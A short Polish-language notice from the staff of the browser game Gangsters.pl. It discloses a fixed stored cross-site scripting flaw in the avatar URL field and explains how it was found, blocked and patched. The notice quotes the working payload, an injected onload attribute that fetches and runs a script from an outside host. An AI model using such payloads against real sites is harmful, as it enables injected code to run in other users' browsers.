W dniu dzisiejszym gracz crammo znalazł i wykorzystał (poinformował administrację o tym fakcie, ale tylko 2h przed upublicznieniem buga) dziurę w bezpieczeństwie gry Gangsters.pl.
Błąd polegał na możliwości dodania do ścieżki URL avatara wpisania dowolnego ciągu znaków, w tym kodu javascript.
W tym przypadku było to coś takiego:
http://i.imgur.com/esiREEk.jpg"onload="$.getScript('http://gangsters2.neocities.org/g.js')
Jak widać gracz założył własną stronę na której zamieścił skrypt, który modyfikował (w locie) zawartość strony gangsters.pl w przypadku, gdy odwiedzający trafił na avatar tego gracza. Po załadowaniu avatara ładował się skrypt, podmieniający tło na klip youtube (swoją drogą efekt był całkiem ciekawy).
Dziękujemy graczowi za znalezienie tej luki, jednak w przyszłości prosimy o niewykorzystywanie ich w tak widoczny sposób, bo budzi niepokój u wielu graczy.
Jednocześnie chcieliśmy poinformować, że błąd ten nie pozwalał na dostęp do serwera lub danych się na nim znajdujących.
Błąd został zablokowany (poprzez blokadę możliwości zmiany avatara) niezwłocznie po ujawnieniu się w dziale Bar, a naprawiony 2h później.
Pozdrawiamy,
Załoga Gangsters.pl